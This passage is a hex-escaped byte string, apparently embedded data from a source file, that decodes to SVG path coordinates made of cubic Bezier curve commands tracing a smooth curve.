\x32\x35\x20\x31\x30\x2e\x30\x32\x37\x35\x31\x31\x31\x30\x35\x31\
\x20\x43\x20\x39\x2e\x31\x35\x37\x37\x31\x38\x33\x34\x39\x30\x39\
\x20\x31\x30\x2e\x30\x35\x39\x30\x32\x34\x39\x39\x32\x39\x20\x39\
\x2e\x31\x36\x33\x39\x35\x39\x34\x31\x37\x39\x32\x20\x31\x30\x2e\
\x30\x39\x31\x30\x38\x37\x37\x37\x38\x20\x39\x2e\x31\x37\x30\x32\
\x30\x30\x34\x38\x36\x37\x36\x20\x31\x30\x2e\x31\x32\x33\x36\x37\
\x31\x34\x37\x33\x37\x20\x43\x20\x39\x2e\x31\x37\x36\x34\x34\x31\
\x35\x35\x35\x35\x39\x20\x31\x30\x2e\x31\x35\x36\x32\x35\x35\x31\
\x36\x39\x34\x20\x39\x2e\x31\x38\x32\x36\x38\x32\x36\x32\x34\x34\
\x33\x20\x31\x30\x2e\x31\x38\x39\x33\x36\x32\x39\x30\x36\x39\x20\
\x39\x2e\x31\x38\x38\x39\x32\x33\x36\x39\x33\x32\x37\x20\x31\x30\
\x2e\x32\x32\x32\x39\x36\x36\x30\x34\x33\x31\x20\x43\x20\x39\x2e\
\x31\x39\x35\x31\x36\x34\x37\x36\x32\x31\x20\x31\x30\x2e\x32\x35\
\x36\x35\x36\x39\x31\x37\x39\x32\x20\x39\x2e\x32\x30\x31\x34\x30\
\x35\x38\x33\x30\x39\x34\x20\x31\x30\x2e\x32\x39\x30\x36\x37\x30\
\x36\x39\x31\x37\x20\x39\x2e\x32\x30\x37\x36\x34\x36\x38\x39\x39\
\x37\x37\x20\x31\x30\x2e\x33\x32\x35\x32\x34\x31\x33\x32\x34\x39\
\x20\x43\x20\x39\x2e\x32\x31\x33\x38\x38\x37\x39\x36\x38\x36\x31\
\x20\x31\x30\x2e\x33\x35\x39\x38\x31\x31\x39\x35\x38\x31\x20\x39\
\x2e\x32\x32\x30\x31\x32\x39\x30\x33\x37\x34\x35\x20\x31\x30\x2e\
\x33\x39\x34\x38\x35\x34\x35\x33\x31\x37\x20\x39\x2e\x32\x32\x36\
\x33\x37\x30\x31\x30\x36\x32\x38\x20\x31\x30\x2e\x34\x33\x30\x33\
\x33\x39\x32\x32\x33\x31\x20\x43\x20\x39\x2e\x32\x33\x32\x36\x31\
\x31\x31\x37\x35\x31\x32\x20\x31\x30\x2e\x34\x36\x35\x38\x32\x33\
\x39\x31\x34\x35\x20\x39\x2e\x32\x33\x38\x38\x35\x32\x32\x34\x33\
\x39\x35\x20\x31\x30\x2e\x35\x30\x31\x37\x35\x33\x33\x38\x30\x38\
\x20\x39\x2e\x32\x34\x35\x30\x39\x33\x33\x31\x32\x37\x39\x20\x31\
\x30\x2e\x35\x33\x38\x30\x39\x37\x32\x37\x38\x35\x20\x43\x20\x39\
\x2e\x32\x35\x31\x33\x33\x34\x33\x38\x31\x36\x33\x20\x31\x30\x2e\
\x35\x37\x34\x34\x34\x31\x31\x37\x36\x32\x20\x39\x2e\x32\x35\x37\
\x35\x37\x35\x34\x35\x30\x34\x36\x20\x31\x30\x2e\x36\x31\x31\x32\
\x30\x31\x39\x39\x35\x39\x20\x39\x2e\x32\x36\x33\x38\x31\x36\x35\
\x31\x39\x33\x20\x31\x30\x2e\x36\x34\x38\x33\x34\x38\x39\x31\x39\
\x39\x20\x43\x20\x39\x2e\x32\x37\x30\x30\x35\x37\x35\x38\x38\x31\
\x34\x20\x31\x30\x2e\x36\x38\x35\x34\x39\x35\x38\x34\x34\x20\x39\
\x2e\x32\x37\x36\x32\x39\x38\x36\x35\x36\x39\x37\x20\x31\x30\x2e\
\x37\x32\x33\x30\x33\x31\x31\x39\x32\x34\x20\x39\x2e\x32\x38\x32\
\x35\x33\x39\x37\x32\x35\x38\x31\x20\x31\x30\x2e\x37\x36\x30\x39\
\x32\x33\x37\x32\x31\x35\x20\x43\x20\x39\x2e\x32\x38\x38\x37\x38\
\x30\x37\x39\x34\x36\x34\x20\x31\x30\x2e\x37\x39\x38\x38\x31\x36\
\x32\x35\x30\x35\x20\x39\x2e\x32\x39\x35\x30\x32\x31\x38\x36\x33\
\x34\x38\x20\x31\x30\x2e\x38\x33\x37\x30\x36\x38\x31\x30\x36\x31\
\x20\x39\x2e\x33\x30\x31\x32\x36\x32\x39\x33\x32\x33\x32\x20\x31\
\x30\x2e\x38\x37\x35\x36\x34\x37\x36\x36\x36\x34\x20\x43\x20\x39\
\x2e\x33\x30\x37\x35\x30\x34\x30\x30\x31\x31\x35\x20\x31\x30\x2e\
\x39\x31\x34\x32\x32\x37\x32\x32\x36\x36\x20\x39\x2e\x33\x31\x33\
\x37\x34\x35\x30\x36\x39\x39\x39\x20\x31\x30\x2e\x39\x35\x33\x31\
\x33\x36\x34\x36\x20\x39\x2e\x33\x31\x39\x39\x38\x36\x31\x33\x38\
\x38\x32\x20\x31\x30\x2e\x39\x39\x32\x33\x34\x33\x34\x31\x35\x35\
\x20\x43\x20\x39\x2e\x33\x32\x36\x32\x32\x37\x32\x30\x37\x36\x36\
\x20\x31\x31\x2e\x30\x33\x31\x35\x35\x30\x33\x37\x31\x20\x39\x2e\
\x33\x33\x32\x34\x36\x38\x32\x37\x36\x35\x20\x31\x31\x2e\x30\x37\
\x31\x30\x35\x36\x38\x33\x36\x38\x20\x39\x2e\x33\x33\x38\x37\x30\
\x39\x33\x34\x35\x33\x33\x20\x31\x31\x2e\x31\x31\x30\x38\x33\x30\
\x35\x38\x31\x39\x20\x43\x20\x39\x2e\x33\x34\x34\x39\x35\x30\x34\
\x31\x34\x31\x37\x20\x31\x31\x2e\x31\x35\x30\x36\x30\x34\x33\x32\
\x37\x20\x39\x2e\x33\x35\x31\x31\x39\x31\x34\x38\x33\x20\x31\x31\
\x2e\x31\x39\x30\x36\x34\x36\x39\x35\x36\x35\x20\x39\x2e\x33\x35\
\x37\x34\x33\x32\x35\x35\x31\x38\x34\x20\x31\x31\x2e\x32\x33\x30\
\x39\x32\x36\x30\x30\x39\x34\x20\x43\x20\x39\x2e\x33\x36\x33\x36\
\x37\x33\x36\x32\x30\x36\x38\x20\x31\x31\x2e\x32\x37\x31\x32\x30\
\x35\x30\x36\x32\x33\x20\x39\x2e\x33\x36\x39\x39\x31\x34\x36\x38\
\x39\x35\x31\x20\x31\x31\x2e\x33\x31\x31\x37\x32\x31\x39\x35\x38\
\x20\x39\x2e\x33\x37\x36\x31\x35\x35\x37\x35\x38\x33\x35\x20\x31\
\x31\x2e\x33\x35\x32\x34\x34\x34\x30\x35\x35\x38\x20\x43\x20\x39\
\x2e\x33\x38\x32\x33\x39\x36\x38\x32\x37\x31\x38\x20\x31\x31\x2e\
\x33\x39\x33\x31\x36\x36\x31\x35\x33\x36\x20\x39\x2e\x33\x38\x38\
\x36\x33\x37\x38\x39\x36\x30\x32\x20\x31\x31\x2e\x34\x33\x34\x30\
\x39\x34\x36\x38\x34\x39\x20\x39\x2e\x33\x39\x34\x38\x37\x38\x39\
\x36\x34\x38\x36\x20\x31\x31\x2e\x34\x37\x35\x31\x39\x36\x38\x37\
\x39\x38\x20\x43\x20\x39\x2e\x34\x30\x31\x31\x32\x30\x30\x33\x33\
\x36\x39\x20\x31\x31\x2e\x35\x31\x36\x32\x39\x39\x30\x37\x34\x37\
\x20\x39\x2e\x34\x30\x37\x33\x36\x31\x31\x30\x32\x35\x33\x20\x31\
\x31\x2e\x35\x35\x37\x35\x37\x35\x39\x37\x34\x38\x20\x39\x2e\x34\
\x31\x33\x36\x30\x32\x31\x37\x31\x33\x36\x20\x31\x31\x2e\x35\x39\
\x38\x39\x39\x34\x37\x33\x31\x35\x20\x43\x20\x39\x2e\x34\x31\x39\
\x38\x34\x33\x32\x34\x30\x32\x20\x31\x31\x2e\x36\x34\x30\x34\x31\
\x33\x34\x38\x38\x31\x20\x39\x2e\x34\x32\x36\x30\x38\x34\x33\x30\
\x39\x30\x34\x20\x31\x31\x2e\x36\x38\x31\x39\x37\x34\x39\x35\x31\
\x36\x20\x39\x2e\x34\x33\x32\x33\x32\x35\x33\x37\x37\x38\x37\x20\
\x31\x31\x2e\x37\x32\x33\x36\x34\x36\x32\x34\x35\x34\x20\x43\x20\
\x39\x2e\x34\x33\x38\x35\x36\x36\x34\x34\x36\x37\x31\x20\x31\x31\
\x2e\x37\x36\x35\x33\x31\x37\x35\x33\x39\x32\x20\x39\x2e\x34\x34\
\x34\x38\x30\x37\x35\x31\x35\x35\x34\x20\x31\x31\x2e\x38\x30\x37\
\x30\x39\x39\x33\x32\x30\x38\x20\x39\x2e\x34\x35\x31\x30\x34\x38\
\x35\x38\x34\x33\x38\x20\x31\x31\x2e\x38\x34\x38\x39\x35\x38\x37\
\x33\x36\x37\x20\x43\x20\x39\x2e\x34\x35\x37\x32\x38\x39\x36\x35\
\x33\x32\x32\x20\x31\x31\x2e\x38\x39\x30\x38\x31\x38\x31\x35\x32\
\x35\x20\x39\x2e\x34\x36\x33\x35\x33\x30\x37\x32\x32\x30\x35\x20\
\x31\x31\x2e\x39\x33\x32\x37\x35\x35\x36\x36\x36\x35\x20\x39\x2e\
\x34\x36\x39\x37\x37\x31\x37\x39\x30\x38\x39\x20\x31\x31\x2e\x39\
\x37\x34\x37\x33\x38\x34\x39\x38\x36\x20\x43\x20\x39\x2e\x34\x37\
\x36\x30\x31\x32\x38\x35\x39\x37\x32\x20\x31\x32\x2e\x30\x31\x36\
\x37\x32\x31\x33\x33\x30\x37\x20\x39\x2e\x34\x38\x32\x32\x35\x33\
\x39\x32\x38\x35\x36\x20\x31\x32\x2e\x30\x35\x38\x37\x34\x39\x37\
\x35\x30\x34\x20\x39\x2e\x34\x38\x38\x34\x39\x34\x39\x39\x37\x34\
\x20\x31\x32\x2e\x31\x30\x30\x37\x39\x31\x31\x30\x32\x32\x20\x43\
\x20\x39\x2e\x34\x39\x34\x37\x33\x36\x30\x36\x36\x32\x33\x20\x31\
\x32\x2e\x31\x34\x32\x38\x33\x32\x34\x35\x33\x39\x20\x39\x2e\x35\
\x30\x30\x39\x37\x37\x31\x33\x35\x30\x37\x20\x31\x32\x2e\x31\x38\
\x34\x38\x38\x36\x38\x31\x32\x34\x20\x39\x2e\x35\x30\x37\x32\x31\
\x38\x32\x30\x33\x39\x20\x31\x32\x2e\x32\x32\x36\x39\x32\x31\x36\
\x39\x36\x37\x20\x43\x20\x39\x2e\x35\x31\x33\x34\x35\x39\x32\x37\
\x32\x37\x34\x20\x31\x32\x2e\x32\x36\x38\x39\x35\x36\x35\x38\x31\
\x20\x39\x2e\x35\x31\x39\x37\x30\x30\x33\x34\x31\x35\x38\x20\x31\
\x32\x2e\x33\x31\x30\x39\x37\x31\x38\x37\x31\x20\x39\x2e\x35\x32\
\x35\x39\x34\x31\x34\x31\x30\x34\x31\x20\x31\x32\x2e\x33\x35\x32\
\x39\x33\x35\x33\x31\x30\x38\x20\x43\x20\x39\x2e\x35\x33\x32\x31\
\x38\x32\x34\x37\x39\x32\x35\x20\x31\x32\x2e\x33\x39\x34\x38\x39\
\x38\x37\x35\x30\x37\x20\x39\x2e\x35\x33\x38\x34\x32\x33\x35\x34\
\x38\x30\x39\x20\x31\x32\x2e\x34\x33\x36\x38\x31\x30\x30\x32\x35\
\x34\x20\x39\x2e\x35\x34\x34\x36\x36\x34\x36\x31\x36\x39\x32\x20\
\x31\x32\x2e\x34\x37\x38\x36\x33\x37\x31\x35\x34\x32\x20\x43\x20\
\x39\x2e\x35\x35\x30\x39\x30\x35\x36\x38\x35\x37\x36\x20\x31\x32\
\x2e\x35\x32\x30\x34\x36\x34\x32\x38\x32\x39\x20\x39\x2e\x35\x35\
\x37\x31\x34\x36\x37\x35\x34\x35\x39\x20\x31\x32\x2e\x35\x36\x32\
\x32\x30\x36\x37\x35\x36\x34\x20\x39\x2e\x35\x36\x33\x33\x38\x37\
\x38\x32\x33\x34\x33\x20\x31\x32\x2e\x36\x30\x33\x38\x33\x32\x39\
\x31\x38\x31\x20\x43\x20\x39\x2e\x35\x36\x39\x36\x32\x38\x38\x39\
\x32\x32\x37\x20\x31\x32\x2e\x36\x34\x35\x34\x35\x39\x30\x37\x39\
\x38\x20\x39\x2e\x35\x37\x35\x38\x36\x39\x39\x36\x31\x31\x20\x31\
\x32\x2e\x36\x38\x36\x39\x36\x38\x32\x32\x37\x20\x39\x2e\x35\x38\
\x32\x31\x31\x31\x30\x32\x39\x39\x34\x20\x31\x32\x2e\x37\x32\x38\
\x33\x32\x39\x30\x37\x36\x34\x20\x43\x20\x39\x2e\x35\x38\x38\x33\
\x35\x32\x30\x39\x38\x37\x37\x20\x31\x32\x2e\x37\x36\x39\x36\x38\
\x39\x39\x32\x35\x39\x20\x39\x2e\x35\x39\x34\x35\x39\x33\x31\x36\
\x37\x36\x31\x20\x31\x32\x2e\x38\x31\x30\x39\x30\x31\x35\x38\x32\
\x33\x20\x39\x2e\x36\x30\x30\x38\x33\x34\x32\x33\x36\x34\x35\x20\
\x31\x32\x2e\x38\x35\x31\x39\x33\x33\x31\x38\x34\x33\x20\x43\x20\
\x39\x2e\x36\x30\x37\x30\x37\x35\x33\x30\x35\x32\x38\x20\x31\x32\
\x2e\x38\x39\x32\x39\x36\x34\x37\x38\x36\x33\x20\x39\x2e\x36\x31\
\x33\x33\x31\x36\x33\x37\x34\x31\x32\x20\x31\x32\x2e\x39\x33\x33\
\x38\x31\x35\x32\x34\x37\x36\x20\x39\x2e\x36\x31\x39\x35\x35\x37\
\x34\x34\x32\x39\x35\x20\x31\x32\x2e\x39\x37\x34\x34\x35\x34\x31\
\x37\x35\x39\x20\x43\x20\x39\x2e\x36\x32\x35\x37\x39\x38\x35\x31\
\x31\x37\x39\x20\x31\x33\x2e\x30\x31\x35\x30\x39\x33\x31\x30\x34\
\x33\x20\x39\x2e\x36\x33\x32\x30\x33\x39\x35\x38\x30\x36\x33\x20\
\x31\x33\x2e\x30\x35\x35\x35\x31\x39\x32\x32\x34\x32\x20\x39\x2e\
\x36\x33\x38\x32\x38\x30\x36\x34\x39\x34\x36\x20\x31\x33\x2e\x30\
\x39\x35\x37\x30\x32\x36\x35\x39\x36\x20\x43\x20\x39\x2e\x36\x34\
\x34\x35\x32\x31\x37\x31\x38\x33\x20\x31\x33\x2e\x31\x33\x35\x38\
\x38\x36\x30\x39\x35\x31\x20\x39\x2e\x36\x35\x30\x37\x36\x32\x37\
\x38\x37\x31\x33\x20\x31\x33\x2e\x31\x37\x35\x38\x32\x35\x33\x38\
\x33\x33\x20\x39\x2e\x36\x35\x37\x30\x30\x33\x38\x35\x35\x39\x37\
\x20\x31\x33\x2e\x32\x31\x35\x34\x39\x31\x32\x31\x30\x39\x20\x43\
\x20\x39\x2e\x36\x36\x33\x32\x34\x34\x39\x32\x34\x38\x31\x20\x31\
\x33\x2e\x32\x35\x35\x31\x35\x37\x30\x33\x38\x34\x20\x39\x2e\x36\
\x36\x39\x34\x38\x35\x39\x39\x33\x36\x34\x20\x31\x33\x2e\x32\x39\
\x34\x35\x34\x37\x37\x35\x37\x32\x20\x39\x2e\x36\x37\x35\x37\x32\
\x37\x30\x36\x32\x34\x38\x20\x31\x33\x2e\x33\x33\x33\x36\x33\x34\
\x36\x36\x31\x37\x20\x43\x20\x39\x2e\x36\x38\x31\x39\x36\x38\x31\
\x33\x31\x33\x31\x20\x31\x33\x2e\x33\x37\x32\x37\x32\x31\x35\x36\
\x36\x33\x20\x39\x2e\x36\x38\x38\x32\x30\x39\x32\x30\x30\x31\x35\
\x20\x31\x33\x2e\x34\x31\x31\x35\x30\x32\x38\x32\x36\x20\x39\x2e\
\x36\x39\x34\x34\x35\x30\x32\x36\x38\x39\x39\x20\x31\x33\x2e\x34\
\x34\x39\x39\x35\x30\x33\x38\x37\x35\x20\x43\x20\x39\x2e\x37\x30\
\x30\x36\x39\x31\x33\x33\x37\x38\x32\x20\x31\x33\x2e\x34\x38\x38\
\x33\x39\x37\x39\x34\x38\x39\x20\x39\x2e\x37\x30\x36\x39\x33\x32\
\x34\x30\x36\x36\x36\x20\x31\x33\x2e\x35\x32\x36\x35\x30\x39\x38\
\x30\x31\x38\x20\x39\x2e\x37\x31\x33\x31\x37\x33\x34\x37\x35\x34\
\x39\x20\x31\x33\x2e\x35\x36\x34\x32\x35\x38\x35\x38\x38\x34\x20\
\x43\x20\x39\x2e\x37\x31\x39\x34\x31\x34\x35\x34\x34\x33\x33\x20\
\x31\x33\x2e\x36\x30\x32\x30\x30\x37\x33\x37\x34\x39\x20\x39\x2e\
\x37\x32\x35\x36\x35\x35\x36\x31\x33\x31\x37\x20\x31\x33\x2e\x36\
\x33\x39\x33\x39\x30\x39\x30\x38\x32\x20\x39\x2e\x37\x33\x31\x38\
\x39\x36\x36\x38\x32\x20\x31\x33\x2e\x36\x37\x36\x33\x38\x32\x35\
\x36\x38\x32\x20\x43\x20\x39\x2e\x37\x33\x38\x31\x33\x37\x37\x35\
\x30\x38\x34\x20\x31\x33\x2e\x37\x31\x33\x33\x37\x34\x32\x32\x38\
\x32\x20\x39\x2e\x37\x34\x34\x33\x37\x38\x38\x31\x39\x36\x37\x20\
\x31\x33\x2e\x37\x34\x39\x39\x37\x31\x36\x35\x34\x38\x20\x39\x2e\
\x37\x35\x30\x36\x31\x39\x38\x38\x38\x35\x31\x20\x31\x33\x2e\x37\
\x38\x36\x31\x34\x39\x30\x30\x36\x39\x20\x43\x20\x39\x2e\x37\x35\
\x36\x38\x36\x30\x39\x35\x37\x33\x35\x20\x31\x33\x2e\x38\x32\x32\
\x33\x32\x36\x33\x35\x39\x20\x39\x2e\x37\x36\x33\x31\x30\x32\x30\
\x32\x36\x31\x38\x20\x31\x33\x2e\x38\x35\x38\x30\x38\x31\x31\x30\
\x36\x39\x20\x39\x2e\x37\x36\x39\x33\x34\x33\x30\x39\x35\x30\x32\
\x20\x31\x33\x2e\x38\x39\x33\x33\x38\x38\x32\x32\x38\x36\x20\x43\
\x20\x39\x2e\x37\x37\x35\x35\x38\x34\x31\x36\x33\x38\x35\x20\x31\
\x33\x2e\x39\x32\x38\x36\x39\x35\x33\x35\x30\x33\x20\x39\x2e\x37\
\x38\x31\x38\x32\x35\x32\x33\x32\x36\x39\x20\x31\x33\x2e\x39\x36\
\x33\x35\x35\x32\x31\x35\x30\x33\x20\x39\x2e\x37\x38\x38\x30\x36\
\x36\x33\x30\x31\x35\x33\x20\x31\x33\x2e\x39\x39\x37\x39\x33\x34\
\x34\x36\x34\x32\x20\x43\x20\x39\x2e\x37\x39\x34\x33\x30\x37\x33\
\x37\x30\x33\x36\x20\x31\x34\x2e\x30\x33\x32\x33\x31\x36\x37\x37\
\x38\x31\x20\x39\x2e\x38\x30\x30\x35\x34\x38\x34\x33\x39\x32\x20\
\x31\x34\x2e\x30\x36\x36\x32\x32\x31\x37\x34\x39\x20\x39\x2e\x38\
\x30\x36\x37\x38\x39\x35\x30\x38\x30\x34\x20\x31\x34\x2e\x30\x39\
\x39\x36\x32\x36\x31\x30\x37\x33\x20\x43\x20\x39\x2e\x38\x31\x33\
\x30\x33\x30\x35\x37\x36\x38\x37\x20\x31\x34\x2e\x31\x33\x33\x30\
\x33\x30\x34\x36\x35\x36\x20\x39\x2e\x38\x31\x39\x32\x37\x31\x36\
\x34\x35\x37\x31\x20\x31\x34\x2e\x31\x36\x35\x39\x33\x31\x31\x39\
\x37\x33\x20\x39\x2e\x38\x32\x35\x35\x31\x32\x37\x31\x34\x35\x34\
\x20\x31\x34\x2e\x31\x39\x38\x33\x30\x35\x39\x36\x34\x20\x43\x20\
\x39\x2e\x38\x33\x31\x37\x35\x33\x37\x38\x33\x33\x38\x20\x31\x34\
\x2e\x32\x33\x30\x36\x38\x30\x37\x33\x30\x36\x20\x39\x2e\x38\x33\
\x37\x39\x39\x34\x38\x35\x32\x32\x32\x20\x31\x34\x2e\x32\x36\x32\
\x35\x32\x36\x33\x36\x35\x36\x20\x39\x2e\x38\x34\x34\x32\x33\x35\
\x39\x32\x31\x30\x35\x20\x31\x34\x2e\x32\x39\x33\x38\x32\x31\x34\
\x39\x36\x20\x43\x20\x39\x2e\x38\x35\x30\x34\x37\x36\x39\x38\x39\
\x38\x39\x20\x31\x34\x2e\x33\x32\x35\x31\x31\x36\x36\x32\x36\x33\
\x20\x39\x2e\x38\x35\x36\x37\x31\x38\x30\x35\x38\x37\x32\x20\x31\
\x34\x2e\x33\x35\x35\x38\x35\x37\x39\x33\x38\x20\x39\x2e\x38\x36\
\x32\x39\x35\x39\x31\x32\x37\x35\x36\x20\x31\x34\x2e\x33\x38\x36\
\x30\x32\x35\x30\x35\x36\x35\x20\x43\x20\x39\x2e\x38\x36\x39\x32\
\x30\x30\x31\x39\x36\x34\x20\x31\x34\x2e\x34\x31\x36\x31\x39\x32\
\x31\x37\x34\x39\x20\x39\x2e\x38\x37\x35\x34\x34\x31\x32\x36\x35\
\x32\x33\x20\x31\x34\x2e\x34\x34\x35\x37\x38\x31\x36\x34\x33\x37\
\x20\x39\x2e\x38\x38\x31\x36\x38\x32\x33\x33\x34\x30\x37\x20\x31\
\x34\x2e\x34\x37\x34\x37\x37\x34\x31\x31\x38\x33\x20\x43\x20\x39\
\x2e\x38\x38\x37\x39\x32\x33\x34\x30\x32\x39\x20\x31\x34\x2e\x35\
\x30\x33\x37\x36\x36\x35\x39\x32\x38\x20\x39\x2e\x38\x39\x34\x31\
\x36\x34\x34\x37\x31\x37\x34\x20\x31\x34\x2e\x35\x33\x32\x31\x35\
\x38\x34\x37\x39\x36\x20\x39\x2e\x39\x30\x30\x34\x30\x35\x35\x34\
\x30\x35\x38\x20\x31\x34\x2e\x35\x35\x39\x39\x33\x31\x34\x39\x33\
\x39\x20\x43\x20\x39\x2e\x39\x30\x36\x36\x34\x36\x36\x30\x39\x34\
\x31\x20\x31\x34\x2e\x35\x38\x37\x37\x30\x34\x35\x30\x38\x33\x20\
\x39\x2e\x39\x31\x32\x38\x38\x37\x36\x37\x38\x32\x35\x20\x31\x34\
\x2e\x36\x31\x34\x38\x35\x34\x39\x32\x35\x32\x20\x39\x2e\x39\x31\
\x39\x31\x32\x38\x37\x34\x37\x30\x38\x20\x31\x34\x2e\x36\x34\x31\
\x33\x36\x35\x35\x34\x38\x32\x20\x43\x20\x39\x2e\x39\x32\x35\x33\
\x36\x39\x38\x31\x35\x39\x32\x20\x31\x34\x2e\x36\x36\x37\x38\x37\
\x36\x31\x37\x31\x31\x20\x39\x2e\x39\x33\x31\x36\x31\x30\x38\x38\
\x34\x37\x36\x20\x31\x34\x2e\x36\x39\x33\x37\x34\x33\x31\x34\x39\
\x33\x20\x39\x2e\x39\x33\x37\x38\x35\x31\x39\x35\x33\x35\x39\x20\
\x31\x34\x2e\x37\x31\x38\x39\x35\x30\x34\x30\x31\x31\x20\x43\x20\
\x39\x2e\x39\x34\x34\x30\x39\x33\x30\x32\x32\x34\x33\x20\x31\x34\
\x2e\x37\x34\x34\x31\x35\x37\x36\x35\x32\x38\x20\x39\x2e\x39\x35\
\x30\x33\x33\x34\x30\x39\x31\x32\x36\x20\x31\x34\x2e\x37\x36\x38\
\x37\x30\x31\x32\x30\x37\x35\x20\x39\x2e\x39\x35\x36\x35\x37\x35\
\x31\x36\x30\x31\x20\x31\x34\x2e\x37\x39\x32\x35\x36\x36\x31\x32\
\x32\x39\x20\x43\x20\x39\x2e\x39\x36\x32\x38\x31\x36\x32\x32\x38\
\x39\x34\x20\x31\x34\x2e\x38\x31\x36\x34\x33\x31\x30\x33\x38\x33\
\x20\x39\x2e\x39\x36\x39\x30\x35\x37\x32\x39\x37\x37\x37\x20\x31\
\x34\x2e\x38\x33\x39\x36\x31\x33\x32\x33\x30\x32\x20\x39\x2e\x39\
\x37\x35\x32\x39\x38\x33\x36\x36\x36\x31\x20\x31\x34\x2e\x38\x36\
\x32\x30\x39\x38\x39\x31\x39\x32\x20\x43\x20\x39\x2e\x39\x38\x31\
\x35\x33\x39\x34\x33\x35\x34\x34\x20\x31\x34\x2e\x38\x38\x34\x35\
\x38\x34\x36\x30\x38\x32\x20\x39\x2e\x39\x38\x37\x37\x38\x30\x35\
\x30\x34\x32\x38\x20\x31\x34\x2e\x39\x30\x36\x33\x36\x39\x36\x30\
\x32\x36\x20\x39\x2e\x39\x39\x34\x30\x32\x31\x35\x37\x33\x31\x32\
\x20\x31\x34\x2e\x39\x32\x37\x34\x34\x31\x33\x30\x37\x20\x43\x20\
\x31\x30\x2e\x30\x30\x30\x32\x36\x32\x36\x34\x32\x20\x31\x34\x2e\
\x39\x34\x38\x35\x31\x33\x30\x31\x31\x33\x20\x31\x30\x2e\x30\x30\
\x36\x35\x30\x33\x37\x31\x30\x38\x20\x31\x34\x2e\x39\x36\x38\x38\
\x36\x37\x31\x33\x33\x32\x20\x31\x30\x2e\x30\x31\x32\x37\x34\x34\
\x37\x37\x39\x36\x20\x31\x34\x2e\x39\x38\x38\x34\x39\x32\x32\x38\
\x30\x36\x20\x43\x20\x31\x30\x2e\x30\x31\x38\x39\x38\x35\x38\x34\
\x38\x35\x20\x31\x35\x2e\x30\x30\x38\x31\x31\x37\x34\x32\x38\x20\
\x31\x30\x2e\x30\x32\x35\x32\x32\x36\x39\x31\x37\x33\x20\x31\x35\
\x2e\x30\x32\x37\x30\x30\x39\x32\x31\x34\x32\x20\x31\x30\x2e\x30\
\x33\x31\x34\x36\x37\x39\x38\x36\x31\x20\x31\x35\x2e\x30\x34\x35\
\x31\x35\x37\x34\x36\x38\x33\x20\x43\x20\x31\x30\x2e\x30\x33\x37\
\x37\x30\x39\x30\x35\x35\x20\x31\x35\x2e\x30\x36\x33\x33\x30\x35\
\x37\x32\x32\x34\x20\x31\x30\x2e\x30\x34\x33\x39\x35\x30\x31\x32\
\x33\x38\x20\x31\x35\x2e\x30\x38\x30\x37\x30\x35\x39\x37\x30\x31\
\x20\x31\x30\x2e\x30\x35\x30\x31\x39\x31\x31\x39\x32\x36\x20\x31\
\x35\x2e\x30\x39\x37\x33\x34\x39\x32\x37\x37\x35\x20\x43\x20\x31\
\x30\x2e\x30\x35\x36\x34\x33\x32\x32\x36\x31\x35\x20\x31\x35\x2e\
\x31\x31\x33\x39\x39\x32\x35\x38\x34\x39\x20\x31\x30\x2e\x30\x36\
\x32\x36\x37\x33\x33\x33\x30\x33\x20\x31\x35\x2e\x31\x32\x39\x38\
\x37\x34\x33\x39\x37\x31\x20\x31\x30\x2e\x30\x36\x38\x39\x31\x34\
\x33\x39\x39\x31\x20\x31\x35\x2e\x31\x34\x34\x39\x38\x37\x30\x33\
\x30\x37\x20\x43\x20\x31\x30\x2e\x30\x37\x35\x31\x35\x35\x34\x36\
\x38\x20\x31\x35\x2e\x31\x36\x30\x30\x39\x39\x36\x36\x34\x34\x20\
\x31\x30\x2e\x30\x38\x31\x33\x39\x36\x35\x33\x36\x38\x20\x31\x35\
\x2e\x31\x37\x34\x34\x33\x38\x34\x39\x31\x31\x20\x31\x30\x2e\x30\
\x38\x37\x36\x33\x37\x36\x30\x35\x37\x20\x31\x35\x2e\x31\x38\x37\
\x39\x39\x37\x30\x39\x30\x31\x20\x43\x20\x31\x30\x2e\x30\x39\x33\
\x38\x37\x38\x36\x37\x34\x35\x20\x31\x35\x2e\x32\x30\x31\x35\x35\
\x35\x36\x38\x39\x20\x31\x30\x2e\x31\x30\x30\x31\x31\x39\x37\x34\
\x33\x33\x20\x31\x35\x2e\x32\x31\x34\x33\x32\x39\x33\x36\x35\x35\
\x20\x31\x30\x2e\x31\x30\x36\x33\x36\x30\x38\x31\x32\x32\x20\x31\
\x35\x2e\x32\x32\x36\x33\x31\x32\x39\x37\x31\x20\x43\x20\x31\x30\
\x2e\x31\x31\x32\x36\x30\x31\x38\x38\x31\x20\x31\x35\x2e\x32\x33\
\x38\x32\x39\x36\x35\x37\x36\x36\x20\x31\x30\x2e\x31\x31\x38\x38\
\x34\x32\x39\x34\x39\x38\x20\x31\x35\x2e\x32\x34\x39\x34\x38\x35\
\x33\x35\x37\x34\x20\x31\x30\x2e\x31\x32\x35\x30\x38\x34\x30\x31\
\x38\x37\x20\x31\x35\x2e\x32\x35\x39\x38\x37\x35\x34\x34\x35\x34\
\x20\x43\x20\x31\x30\x2e\x31\x33\x31\x33\x32\x35\x30\x38\x37\x35\
\x20\x31\x35\x2e\x32\x37\x30\x32\x36\x35\x35\x33\x33\x34\x20\x31\
\x30\x2e\x31\x33\x37\x35\x36\x36\x31\x35\x36\x33\x20\x31\x35\x2e\
\x32\x37\x39\x38\x35\x32\x31\x32\x33\x20\x31\x30\x2e\x31\x34\x33\
\x38\x30\x37\x32\x32\x35\x32\x20\x31\x35\x2e\x32\x38\x38\x36\x33\
\x32\x36\x33\x32\x36\x20\x43\x20\x31\x30\x2e\x31\x35\x30\x30\x34\
\x38\x32\x39\x34\x20\x31\x35\x2e\x32\x39\x37\x34\x31\x33\x31\x34\
\x32\x31\x20\x31\x30\x2e\x31\x35\x36\x32\x38\x39\x33\x36\x32\x39\
\x20\x31\x35\x2e\x33\x30\x35\x33\x38\x32\x37\x32\x31\x37\x20\x31\
\x30\x2e\x31\x36\x32\x35\x33\x30\x34\x33\x31\x37\x20\x31\x35\x2e\
\x33\x31\x32\x35\x34\x30\x30\x38\x20\x43\x20\x31\x30\x2e\x31\x36\
\x38\x37\x37\x31\x35\x30\x30\x35\x20\x31\x35\x2e\x33\x31\x39\x36\
\x39\x37\x34\x33\x38\x33\x20\x31\x30\x2e\x31\x37\x35\x30\x31\x32\
\x35\x36\x39\x34\x20\x31\x35\x2e\x33\x32\x36\x30\x33\x37\x36\x38\
\x38\x37\x20\x31\x30\x2e\x31\x38\x31\x32\x35\x33\x36\x33\x38\x32\
